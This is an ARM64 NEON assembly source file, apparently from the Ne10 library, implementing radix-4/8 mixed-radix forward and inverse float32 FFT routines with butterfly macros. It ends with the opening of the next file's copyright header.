#define q_in0_i v1.4s
#define q_in1_r v2.4s
#define q_in1_i v3.4s
#define q_in2_r v4.4s
#define q_in2_i v5.4s
#define q_in3_r v6.4s
#define q_in3_i v7.4s
#define q_s0_r v8.4s
#define q_s0_i v9.4s
#define q_s1_r v10.4s
#define q_s1_i v11.4s
#define q_s2_r v12.4s
#define q_s2_i v13.4s
#define q_s3_r v14.4s
#define q_s3_i v15.4s
#define q_out0_r v16.4s
#define q_out0_i v17.4s
#define q_out1_r v18.4s
#define q_out1_i v19.4s
#define q_out2_r v20.4s
#define q_out2_i v21.4s
#define q_out3_r v22.4s
#define q_out3_i v23.4s
#define q_out_r0246 v8.4s
#define q_out_i0246 v9.4s
#define q_out_r1357 v10.4s
#define q_out_i1357 v11.4s
#define q_out_r8ace v12.4s
#define q_out_i8ace v13.4s
#define q_out_r9bdf v14.4s
#define q_out_i9bdf v15.4s
#define q_in4_r v8.4s
#define q_in4_i v9.4s
#define q_in5_r v10.4s
#define q_in5_i v11.4s
#define q_in6_r v12.4s
#define q_in6_i v13.4s
#define q_in7_r v14.4s
#define q_in7_i v15.4s
#define q_sin0_r v16.4s
#define q_sin0_i v17.4s
#define q_sin1_r v18.4s
#define q_sin1_i v19.4s
#define q_sin2_r v20.4s
#define q_sin2_i v21.4s
#define q_sin3_r v22.4s
#define q_sin3_i v23.4s
#define q_sin4_r v24.4s
#define q_sin4_i v25.4s
#define q_sin5_r v26.4s
#define q_sin5_i v27.4s
#define q_sin6_r v28.4s
#define q_sin6_i v29.4s
#define q_sin7_r v30.4s
#define q_sin7_i v31.4s
#define d_tw_twn v0.2s
#define q_s5_r v12.4s
#define q_s5_i v13.4s
#define q_s7_r v10.4s
#define q_s7_i v11.4s
#define q_s8_r v0.4s
#define q_s8_i v1.4s
#define q_s9_r v2.4s
#define q_s9_i v3.4s
#define q_s10_r v4.4s
#define q_s10_i v5.4s
#define q_s11_r v6.4s
#define q_s11_i v7.4s
#define q_s12_r v8.4s
#define q_s12_i v9.4s
#define q_s13_r v16.4s
#define q_s13_i v17.4s
#define q_s14_r v18.4s
#define q_s14_i v19.4s
#define q_s15_r v24.4s
#define q_s15_i v25.4s
#define q_out_r0 v10.4s
#define q_out_i0 v11.4s
#define q_out_r1 v12.4s
#define q_out_i1 v13.4s
#define q_out_r2 v14.4s
#define q_out_i2 v15.4s
#define q_out_r3 v20.4s
#define q_out_i3 v21.4s
#define q_out_r4 v22.4s
#define q_out_i4 v23.4s
#define q_out_r5 v26.4s
#define q_out_i5 v27.4s
#define q_out_r6 v28.4s
#define q_out_i6 v29.4s
#define q_out_r7 v30.4s
#define q_out_i7 v31.4s
#define q_out_r028a v16.4s
#define q_out_i028a v18.4s
#define q_out_r139b v0.4s
#define q_out_i139b v2.4s
#define q_out_r46ce v4.4s
#define q_out_i46ce v6.4s
#define q_out_r57df v8.4s
#define q_out_i57df v10.4s
#define q_out_r028a_h v17.4s
#define q_out_i028a_h v19.4s
#define q_out_r139b_h v1.4s
#define q_out_i139b_h v3.4s
#define q_out_r46ce_h v5.4s
#define q_out_i46ce_h v7.4s
#define q_out_r57df_h v9.4s
#define q_out_i57df_h v11.4s
#define q_out0_r0246 v12.4s
#define q_out0_i0246 v13.4s
#define q_out1_r1357 v14.4s
#define q_out1_i1357 v15.4s
#define q_out2_r8ace v20.4s
#define q_out2_i8ace v21.4s
#define q_out3_r9bdf v22.4s
#define q_out3_i9bdf v23.4s
#define q_out0_r0246_h v24.4s
#define q_out0_i0246_h v25.4s
#define q_out1_r1357_h v26.4s
#define q_out1_i1357_h v27.4s
#define q_out2_r8ace_h v28.4s
#define q_out2_i8ace_h v29.4s
#define q_out3_r9bdf_h v30.4s
#define q_out3_i9bdf_h v31.4s
/* NEON register aliases for the mstride loop */
#define q_tw0_r v8.4s
#define q_tw0_i v9.4s
#define q_tw1_r v10.4s
#define q_tw1_i v11.4s
#define q_tw2_r v12.4s
#define q_tw2_i v13.4s
#define q_scr1_r v14.4s
#define q_scr1_i v15.4s
#define q_scr2_r v16.4s
#define q_scr2_i v17.4s
#define q_scr3_r v18.4s
#define q_scr3_i v19.4s
#define q_scr4_r v20.4s
#define q_scr4_i v21.4s
#define q_scr5_r v22.4s
#define q_scr5_i v23.4s
#define q_scr6_r v24.4s
#define q_scr6_i v25.4s
#define q_scr7_r v26.4s
#define q_scr7_i v27.4s
#define q_fout0_r v14.4s
#define q_fout0_i v15.4s
#define q_fout1_r v16.4s
#define q_fout1_i v17.4s
#define q_fout2_r v18.4s
#define q_fout2_i v19.4s
#define q_fout3_r v20.4s
#define q_fout3_i v21.4s
#define d_one_by_nfft v31.2s
#define q_one_by_nfft v31.4s
/* radix 4 butterfly without twiddles */
.macro BUTTERFLY4X4_WITHOUT_TWIDDLES inverse
fadd q_s0_r, q_in0_r, q_in2_r
fadd q_s0_i, q_in0_i, q_in2_i
fsub q_s1_r, q_in0_r, q_in2_r
fsub q_s1_i, q_in0_i, q_in2_i
fadd q_s2_r, q_in1_r, q_in3_r
fadd q_s2_i, q_in1_i, q_in3_i
fsub q_s3_r, q_in1_r, q_in3_r
fsub q_s3_i, q_in1_i, q_in3_i
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
fsub q_out2_r, q_s0_r, q_s2_r
fsub q_out2_i, q_s0_i, q_s2_i
fadd q_out0_r, q_s0_r, q_s2_r
fadd q_out0_i, q_s0_i, q_s2_i
.ifeqs "\inverse", "TRUE"
fsub q_out1_r, q_s1_r, q_s3_i
fadd q_out1_i, q_s1_i, q_s3_r
fadd q_out3_r, q_s1_r, q_s3_i
fsub q_out3_i, q_s1_i, q_s3_r
.else
fadd q_out1_r, q_s1_r, q_s3_i
fsub q_out1_i, q_s1_i, q_s3_r
fsub q_out3_r, q_s1_r, q_s3_i
fadd q_out3_i, q_s1_i, q_s3_r
.endif
zip1 q_out_r0246, q_out0_r, q_out2_r
zip2 q_out_r8ace, q_out0_r, q_out2_r
zip1 q_out_r1357, q_out1_r, q_out3_r
zip2 q_out_r9bdf, q_out1_r, q_out3_r
zip1 q_out_i0246, q_out0_i, q_out2_i
zip2 q_out_i8ace, q_out0_i, q_out2_i
zip1 q_out_i1357, q_out1_i, q_out3_i
zip2 q_out_i9bdf, q_out1_i, q_out3_i
st4 {q_out_r0246, q_out_i0246, q_out_r1357, q_out_i1357}, [p_tmp], #64
st4 {q_out_r8ace, q_out_i8ace, q_out_r9bdf, q_out_i9bdf}, [p_tmp], #64
.endm
/* radix 4 butterfly with twiddles */
.macro BUTTERFLY4X4_WITH_TWIDDLES inverse, last_stage
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #32
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #32
fmul q_scr1_r, q_in1_r, q_tw0_r
fmul q_scr1_i, q_in1_i, q_tw0_r
fmul q_scr2_r, q_in2_r, q_tw1_r
fmul q_scr2_i, q_in2_i, q_tw1_r
fmul q_scr3_r, q_in3_r, q_tw2_r
fmul q_scr3_i, q_in3_i, q_tw2_r
.ifeqs "\inverse", "TRUE"
fmla q_scr1_r, q_in1_i, q_tw0_i
fmls q_scr1_i, q_in1_r, q_tw0_i
fmla q_scr2_r, q_in2_i, q_tw1_i
fmls q_scr2_i, q_in2_r, q_tw1_i
fmla q_scr3_r, q_in3_i, q_tw2_i
fmls q_scr3_i, q_in3_r, q_tw2_i
.else
fmls q_scr1_r, q_in1_i, q_tw0_i
fmla q_scr1_i, q_in1_r, q_tw0_i
fmls q_scr2_r, q_in2_i, q_tw1_i
fmla q_scr2_i, q_in2_r, q_tw1_i
fmls q_scr3_r, q_in3_i, q_tw2_i
fmla q_scr3_i, q_in3_r, q_tw2_i
.endif
fadd q_scr4_r, q_in0_r, q_scr2_r
fadd q_scr4_i, q_in0_i, q_scr2_i
fsub q_scr5_r, q_in0_r, q_scr2_r
fsub q_scr5_i, q_in0_i, q_scr2_i
fadd q_scr6_r, q_scr1_r, q_scr3_r
fadd q_scr6_i, q_scr1_i, q_scr3_i
fsub q_scr7_r, q_scr1_r, q_scr3_r
fsub q_scr7_i, q_scr1_i, q_scr3_i
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
ld1 {d_one_by_nfft}, [sp]
dup q_one_by_nfft, d_one_by_nfft[0]
.endif
.endif
fadd q_fout0_r, q_scr4_r, q_scr6_r
fadd q_fout0_i, q_scr4_i, q_scr6_i
fsub q_fout2_r, q_scr4_r, q_scr6_r
fsub q_fout2_i, q_scr4_i, q_scr6_i
.ifeqs "\inverse", "TRUE"
fsub q_fout1_r, q_scr5_r, q_scr7_i
fadd q_fout1_i, q_scr5_i, q_scr7_r
fadd q_fout3_r, q_scr5_r, q_scr7_i
fsub q_fout3_i, q_scr5_i, q_scr7_r
.else
fadd q_fout1_r, q_scr5_r, q_scr7_i
fsub q_fout1_i, q_scr5_i, q_scr7_r
fsub q_fout3_r, q_scr5_r, q_scr7_i
fadd q_fout3_i, q_scr5_i, q_scr7_r
.endif
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
fmul q_fout0_r, q_fout0_r, q_one_by_nfft
fmul q_fout0_i, q_fout0_i, q_one_by_nfft
fmul q_fout2_r, q_fout2_r, q_one_by_nfft
fmul q_fout2_i, q_fout2_i, q_one_by_nfft
fmul q_fout1_r, q_fout1_r, q_one_by_nfft
fmul q_fout1_i, q_fout1_i, q_one_by_nfft
fmul q_fout3_r, q_fout3_r, q_one_by_nfft
fmul q_fout3_i, q_fout3_i, q_one_by_nfft
.endif
.endif
st2 {q_fout0_r, q_fout0_i}, [p_out1], mstep
st2 {q_fout1_r, q_fout1_i}, [p_out1], mstep
st2 {q_fout2_r, q_fout2_i}, [p_out1], mstep
st2 {q_fout3_r, q_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #32
.endm
/* radix 8 butterfly without twiddles */
.macro BUTTERFLY8X4_WITHOUT_TWIDDLES inverse
/**
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
adr tmp0, .L_TW_81
ld2 {q_in0_r, q_in0_i}, [p_in1], fstep
ld2 {q_in2_r, q_in2_i}, [p_in1], fstep
ld2 {q_in4_r, q_in4_i}, [p_in1], fstep
ld2 {q_in6_r, q_in6_i}, [p_in1], fstep
ld2 {q_in1_r, q_in1_i}, [p_in1], fstep
ld2 {q_in3_r, q_in3_i}, [p_in1], fstep
ld2 {q_in5_r, q_in5_i}, [p_in1], fstep
ld2 {q_in7_r, q_in7_i}, [p_in1], fstep
/* radix 4 butterfly without twiddles */
fadd q_sin0_r, q_in0_r, q_in1_r
fadd q_sin0_i, q_in0_i, q_in1_i
fsub q_sin1_r, q_in0_r, q_in1_r
fsub q_sin1_i, q_in0_i, q_in1_i
ld1 {d_tw_twn}, [tmp0]
fadd q_sin2_r, q_in2_r, q_in3_r
fadd q_sin2_i, q_in2_i, q_in3_i
fsub q_sin3_r, q_in2_r, q_in3_r
fsub q_sin3_i, q_in2_i, q_in3_i
fadd q_sin4_r, q_in4_r, q_in5_r
fadd q_sin4_i, q_in4_i, q_in5_i
fsub q_sin5_r, q_in4_r, q_in5_r
fsub q_sin5_i, q_in4_i, q_in5_i
fadd q_sin6_r, q_in6_r, q_in7_r
fadd q_sin6_i, q_in6_i, q_in7_i
fsub q_sin7_r, q_in6_r, q_in7_r
fsub q_sin7_i, q_in6_i, q_in7_i
.ifeqs "\inverse", "TRUE"
fneg q_s5_r, q_sin5_i
shl q_s5_i, q_sin5_r, #0
fsub q_s3_r, q_sin3_r, q_sin3_i
fadd q_s3_i, q_sin3_i, q_sin3_r
fadd q_s7_r, q_sin7_r, q_sin7_i
fsub q_s7_i, q_sin7_i, q_sin7_r
.else
fneg q_s5_i, q_sin5_r
shl q_s5_r, q_sin5_i, 0
fadd q_s3_r, q_sin3_r, q_sin3_i
fsub q_s3_i, q_sin3_i, q_sin3_r
fsub q_s7_r, q_sin7_r, q_sin7_i
fadd q_s7_i, q_sin7_i, q_sin7_r
.endif
fmul q_s3_r, q_s3_r, d_tw_twn[0]
fmul q_s3_i, q_s3_i, d_tw_twn[0]
fmul q_s7_r, q_s7_r, d_tw_twn[1]
fmul q_s7_i, q_s7_i, d_tw_twn[1]
/* radix 2 butterfly */
fadd q_s8_r, q_sin0_r, q_sin4_r
fadd q_s8_i, q_sin0_i, q_sin4_i
fadd q_s9_r, q_sin1_r, q_s5_r
fadd q_s9_i, q_sin1_i, q_s5_i
fsub q_s10_r, q_sin0_r, q_sin4_r
fsub q_s10_i, q_sin0_i, q_sin4_i
fsub q_s11_r, q_sin1_r, q_s5_r
fsub q_s11_i, q_sin1_i, q_s5_i
/* radix 2 butterfly */
fadd q_s12_r, q_sin2_r, q_sin6_r
fadd q_s12_i, q_sin2_i, q_sin6_i
fadd q_s13_r, q_s3_r, q_s7_r
fadd q_s13_i, q_s3_i, q_s7_i
fsub q_s14_r, q_sin2_r, q_sin6_r
fsub q_s14_i, q_sin2_i, q_sin6_i
fsub q_s15_r, q_s3_r, q_s7_r
fsub q_s15_i, q_s3_i, q_s7_i
fsub q_out_r4, q_s8_r, q_s12_r
fsub q_out_i4, q_s8_i, q_s12_i
fsub q_out_r5, q_s9_r, q_s13_r
fsub q_out_i5, q_s9_i, q_s13_i
fadd q_out_r0, q_s8_r, q_s12_r
fadd q_out_i0, q_s8_i, q_s12_i
fadd q_out_r1, q_s9_r, q_s13_r
fadd q_out_i1, q_s9_i, q_s13_i
.ifeqs "\inverse", "TRUE"
fsub q_out_r2, q_s10_r, q_s14_i
fadd q_out_i2, q_s10_i, q_s14_r
fsub q_out_r3, q_s11_r, q_s15_i
fadd q_out_i3, q_s11_i, q_s15_r
fadd q_out_r6, q_s10_r, q_s14_i
fsub q_out_i6, q_s10_i, q_s14_r
fadd q_out_r7, q_s11_r, q_s15_i
fsub q_out_i7, q_s11_i, q_s15_r
.else
fadd q_out_r2, q_s10_r, q_s14_i
fsub q_out_i2, q_s10_i, q_s14_r
fadd q_out_r3, q_s11_r, q_s15_i
fsub q_out_i3, q_s11_i, q_s15_r
fsub q_out_r6, q_s10_r, q_s14_i
fadd q_out_i6, q_s10_i, q_s14_r
fsub q_out_r7, q_s11_r, q_s15_i
fadd q_out_i7, q_s11_i, q_s15_r
.endif
zip1 q_out_r028a, q_out_r0, q_out_r2
zip2 q_out_r028a_h, q_out_r0, q_out_r2
zip1 q_out_i028a, q_out_i0, q_out_i2
zip2 q_out_i028a_h, q_out_i0, q_out_i2
zip1 q_out_r139b, q_out_r1, q_out_r3
zip2 q_out_r139b_h, q_out_r1, q_out_r3
zip1 q_out_i139b, q_out_i1, q_out_i3
zip2 q_out_i139b_h, q_out_i1, q_out_i3
zip1 q_out_r46ce, q_out_r4, q_out_r6
zip2 q_out_r46ce_h, q_out_r4, q_out_r6
zip1 q_out_i46ce, q_out_i4, q_out_i6
zip2 q_out_i46ce_h, q_out_i4, q_out_i6
zip1 q_out_r57df, q_out_r5, q_out_r7
zip2 q_out_r57df_h, q_out_r5, q_out_r7
zip1 q_out_i57df, q_out_i5, q_out_i7
zip2 q_out_i57df_h, q_out_i5, q_out_i7
zip1 v12.2d, v16.2d, v4.2d
zip2 v20.2d, v16.2d, v4.2d
zip1 v24.2d, v17.2d, v5.2d
zip2 v28.2d, v17.2d, v5.2d
zip1 v13.2d, v18.2d, v6.2d
zip2 v21.2d, v18.2d, v6.2d
zip1 v25.2d, v19.2d, v7.2d
zip2 v29.2d, v19.2d, v7.2d
zip1 v14.2d, v0.2d, v8.2d
zip2 v22.2d, v0.2d, v8.2d
zip1 v26.2d, v1.2d, v9.2d
zip2 v30.2d, v1.2d, v9.2d
zip1 v15.2d, v2.2d, v10.2d
zip2 v23.2d, v2.2d, v10.2d
zip1 v27.2d, v3.2d, v11.2d
zip2 v31.2d, v3.2d, v11.2d
st4 {q_out0_r0246, q_out0_i0246, q_out1_r1357, q_out1_i1357}, [p_tmp], #64
st4 {q_out2_r8ace, q_out2_i8ace, q_out3_r9bdf, q_out3_i9bdf}, [p_tmp], #64
st4 {q_out0_r0246_h, q_out0_i0246_h, q_out1_r1357_h, q_out1_i1357_h}, [p_tmp], #64
st4 {q_out2_r8ace_h, q_out2_i8ace_h, q_out3_r9bdf_h, q_out3_i9bdf_h}, [p_tmp], #64
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #32
.endm
.align 4
.L_TW_81:
.float 0.70710678
.float -0.70710678
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_float32_neon
.type ne10_mixed_radix_fft_forward_float32_neon, %function
ne10_mixed_radix_fft_forward_float32_neon:
sub sp, sp, #16
stp x29, x30, [sp]
sub sp, sp, #64
st1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
sub sp, sp, #64
st1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
/* get factors[0]---stage_count factors[1]---fstride*/
ldr stage_count, [p_factors]
lsr fstride, stage_count, 32
lsl stage_count, stage_count, 32
lsr stage_count, stage_count, 32
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
/* get factors[2*stage_count]--- the first radix */
/* get factors[2*stage_count-1]--- mstride */
sub p_factors, p_factors, #4 /* get the address of factors[2*stage_count-1] */
ldr mstride, [p_factors]
lsr radix, mstride, 32
lsl mstride, mstride, 32
lsr mstride, mstride, 32
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
.L_ne10_radix4_butterfly_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_first_stage_fstride
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_tmp, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_end:
/*Return From Function*/
ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
add sp, sp, #64
ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
add sp, sp, #64
ldp x29, x30, [sp]
add sp, sp, #16
ret
/* end of ne10_mixed_radix_fft_forward_float32_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_float32_neon
.type ne10_mixed_radix_fft_backward_float32_neon, %function
ne10_mixed_radix_fft_backward_float32_neon:
sub sp, sp, #16
stp x29, x30, [sp]
sub sp, sp, #64
st1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
sub sp, sp, #64
st1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
/* get factors[0]---stage_count factors[1]---fstride*/
ldr stage_count, [p_factors]
lsr fstride, stage_count, 32
lsl stage_count, stage_count, 32
lsr stage_count, stage_count, 32
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
/* get factors[2*stage_count]--- the first radix */
/* get factors[2*stage_count-1]--- mstride */
sub p_factors, p_factors, #4 /* get the address of factors[2*stage_count-1] */
ldr mstride, [p_factors]
lsr radix, mstride, 32
lsl mstride, mstride, 32
lsr mstride, mstride, 32
/* calculate 1/nfft for the last stage */
mul tmp0, radix, fstride
fmov s0, #0.5
scvtf s1, tmp0, #1
fdiv s0, s0, s1
sub sp, sp, #16
stp d0, d1, [sp]
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
.L_ne10_radix4_butterfly_inverse_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_first_stage_fstride
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_tmp, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
mov p_fin, p_fout
mov p_fout, p_buffer
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_end:
/*Return From Function*/
ldp d0, d1, [sp]
add sp, sp, #16
ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [sp]
add sp, sp, #64
ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [sp]
add sp, sp, #64
ldp x29, x30, [sp]
add sp, sp, #16
ret
/* end of ne10_mixed_radix_fft_backward_float32_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 49,308 | modules/dsp/NE10_fft_int32.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
